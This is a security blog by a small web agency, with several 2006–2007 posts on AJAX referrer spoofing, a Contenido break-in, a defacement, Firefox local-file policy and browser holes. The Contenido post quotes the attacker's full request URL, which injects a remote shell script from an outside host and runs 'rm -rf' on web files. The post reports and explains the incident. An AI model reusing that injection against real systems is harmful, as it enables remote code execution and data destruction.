AJAX security

handgestrickt was curious about how secure AJAX really is. so we wrote some scripts that tried to access data on foreign hosts and to fake the referrer (the HTTP 1.1 RFC 2616 specification misspelled this word as "Referer"). the result is great and makes us feel much better about AJAX: all the new browsers refuse to let a script manipulate the "Referer" header and refuse to let it access foreign hosts. we tested Firefox 2, Opera 9 and Internet Explorer 7 and used Prototype.js. additionally we checked whether it is Prototype.js itself that refuses to set the "Referer", and it definitely is not; the restriction is enforced by the browser, not by the library.

in the following code we used a PHP page that just outputs phpinfo(). we accessed this page with AJAX and a fake "Referer" header. try this at home if you like:

<html>
<head>
 <title>refspoof-JS</title>
 <script src="js/prototype.js" language="JavaScript" type="text/javascript"></script>
 <script language="JavaScript">
var refspoof = {
        test: function() {
                new Ajax.Request('phpinfo.php', {
                   ...

Sunday, 11. March 2007 • security • 0 comments/trackbacks

Contenido Code Injection

yesterday one of our customers' servers was attacked. the whole Contenido installation and all other directories were deleted. after checking the Apache logs it was obvious what had happened:

the IP address 201.19.76.194 started several attacks between 0:55 and 1:00 o'clock. the attacker used a TembeddedWB-based browser and tried to inject code into the Contenido class /contenido/classes/class.inuse.php. the code injected was fetched from http://www.tritonsdr2.by.ru/cmd.txt, a script which reports versions and paths to the attacker and gives them a shell. at 0:56 o'clock the injection was successful and Apache returned status code 200 for the attack request. after this the website was completely gone. fortunately the database stayed untouched.

in detail, the full URL used was

/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.tritonsdr2.by.ru/cmd.txt?&cmd=cd%20/data/export/http/WEB_DIR/http;rm%20-rf%20index.html;%20rm%20-rf%20index.*

this manipulated the Contenido variable

$cfg[path][contenido]

in a way that class.inuse.php...

Thursday, 15. February 2007 • security • 0 comments/trackbacks

congratulations crackers child!

"Hacked By Crackers_Child
crackers_child@sibersavascilar.com
it is our game only for intelligent people
Stupids (Lamers) Cant Play It , They Only Suppose you have good security ? :D
BiG and Dangerous Game
H-A-C-K
BlackHat"

this was the intelligent message they left on our website after hacking the complete server.

1. intelligent people speak English, not kindergarten blabla
2. intelligent people use their skills for something useful, instead of compensating for their complexes and ruined childhood by damaging other people's property
3. so who are the stupid lamers?
4. go and learn some HTML, because the HTML we found was ancient HTML 3.2

feel free to use the above e-mail address to write them some e-mails and tell them how sorry we all are for them!

server provider:
"the IP of the hacker could be followed to Budapest, but it is nearly impossible to catch those people by law. [...] reading the logs to track the complete steps the hacker did showed that data was overwritten, but not read. there is no...

Saturday, 26. August 2006 • security • 0 comments/trackbacks

Firefox blocks local links

recently a website that handgestrickt uses frequently had some of its content blocked. an analysis showed that the website was referencing local content on the hard disk. the M$ Internet Exploiter, well known as the biggest security hole in the universe, allows these references; Firefox and Opera do not. another reason why we use Firefox here!

the risks are clear. some people could start programs on your computer, reference local content into a frame, then use JavaScript to read the content and send it off through a web form. bad people have a lot of bad ideas about how to exploit this.

the new releases of Firefox allow a per-website policy that grants selected websites access to your local files. note that such a whitelist entry re-enables for that one site exactly the risk described above, so only list sites you fully trust. all you have to do is add the following to the user.js in your profile folder:

user_pref("capability.policy.policynames", "localfilelinks");

user_pref("capability.policy.localfilelinks.sites",
"http://www.example.com");

user_pref("capability.policy.localfilelinks.checkloaduri.enabled",
"allAccess");

you can also add several websites...

Tuesday, 22. August 2006 • security • 1 comment/trackback

BlueFrog is dead

recently handgestrickt netzwerk followed the fight "BlueFrog versus international spammers". there is a loser: BlueFrog. after ongoing, serious DDoS attacks BlueFrog gave up. the spammers used millions of trojan-infected computers to attack the BlueFrog server. if you still have BlueFrog installed, you can uninstall it. BlueFrog is dead! the only thing you can do is use the normal spam filters and get rid of this crap like you always did!

if only one person in hundreds takes up an offer from a spam e-mail, gets infected by a trojan horse or is tricked by a phishing e-mail, the bad guys have already succeeded. every day the bad guys find another person who has no clue about e-mail security. that's how they earn money!

some security companies around the world warn about internet extortion. some bad guys threaten big internet services with attacks on their servers if they do not pay a sum of money. the bad guys run permanent DDoS attacks to make the service unusable or hack some...

Tuesday, 30. May 2006 • security • 0 comments/trackbacks

holes in MSIE and Firefox

in recent days new critical security holes in both browsers, Microsoft Internet Explorer 6 and Firefox 1.5.0.2, were made public.

the company Secunia published a new exploit for Microsoft Internet Explorer 6, based on an exploit by Michal Zalewski. nested OBJECT elements cause MSIE to dereference a NULL pointer in mshtml.dll. this hole can be used to run malicious code on a user's machine.

related:
http://secunia.com/advisories/19762/
http://lists.grok.org.uk/pipermail/full-disclosure/2006-April/045422.html

the company securident released an exploit for Firefox 1.5.0.2. the function call iframe.contentWindow.focus() can crash the browser. a possible buffer overflow could allow running malicious code on a user's machine. the Firefox developer Daniel Veditz has already confirmed this exploit.

related:
http://www.securident.com/vuln/ff.txt

Friday, 28. April 2006 • security • 0 comments/trackbacks